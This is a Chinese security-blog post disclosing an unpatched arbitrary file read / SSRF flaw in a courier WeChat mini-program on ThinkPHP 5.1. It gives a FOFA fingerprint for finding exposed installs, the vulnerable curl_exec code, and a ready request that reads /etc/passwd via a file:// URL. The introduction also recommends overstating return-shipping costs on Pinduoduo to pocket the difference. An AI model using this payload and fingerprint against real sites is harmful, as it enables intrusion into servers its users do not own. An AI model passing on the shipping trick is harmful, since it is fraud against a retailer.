某最新版快递微信小程序系统存在前台任意文件读取漏洞

admin 2024年10月31日18:25:02评论17 views字数 1662阅读5分32秒阅读模式
 

0x00 系统简介

源码站简介:2024最新版快递跑腿微信小程序,支持 查快递,查运费,分享佣金,修改地址,个人中心等功能,现在电商平台退换货量大,快递需求量大,对接物流一个单子4块到6块之间 其中间是例如润 其余的 就不说了吧 互站上买的源码 分享一下 还有个方法赚钱就是 拼多多退货自己邮寄 5块钱 运费自己填写12元 白捡7元美滋滋.

Fofa指纹:"/static/default/newwap/lang/js/jquery.localize.min.js"

某最新版快递微信小程序系统存在前台任意文件读取漏洞某最新版快递微信小程序系统存在前台任意文件读取漏洞某最新版快递微信小程序系统存在前台任意文件读取漏洞

框架:ThinkPHP 5.1.0 Debug:True

0x01 漏洞分析&复现

位于 /weixin/controller/Index.php 控制器的httpRequest方法存在curl_exec函数,且传参url均可控,导致漏洞产生.

//请求数据public function httpRequest($url,$data = null){  $curl = curl_init();  curl_setopt($curl,CURLOPT_URL,$url);  curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);  curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,FALSE);  if(!empty($data)){    curl_setopt($curl,CURLOPT_POST,1);    curl_setopt($curl,CURLOPT_POSTFIELDS,$data);  }  curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);  curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);  $output = curl_exec($curl);  curl_close($curl);  return $output;}

Payload:

GET /weixin/index/httpRequest?url=file:///etc/passwd HTTP/2Host: 127.0.0.1Cookie: think_var=zh-cn; PHPSESSID=6igfjn7ik5nrk3bjc0i25ek357Cache-Control: max-age=0Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

某最新版快递微信小程序系统存在前台任意文件读取漏洞

0x02 源码下载

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

快递小程序源码关注公众号发送 241031 获取!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):某最新版快递微信小程序系统存在前台任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月31日18:25:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某最新版快递微信小程序系统存在前台任意文件读取漏洞https://cn-sec.com/archives/3338399.html

发表评论

匿名网友 填写信息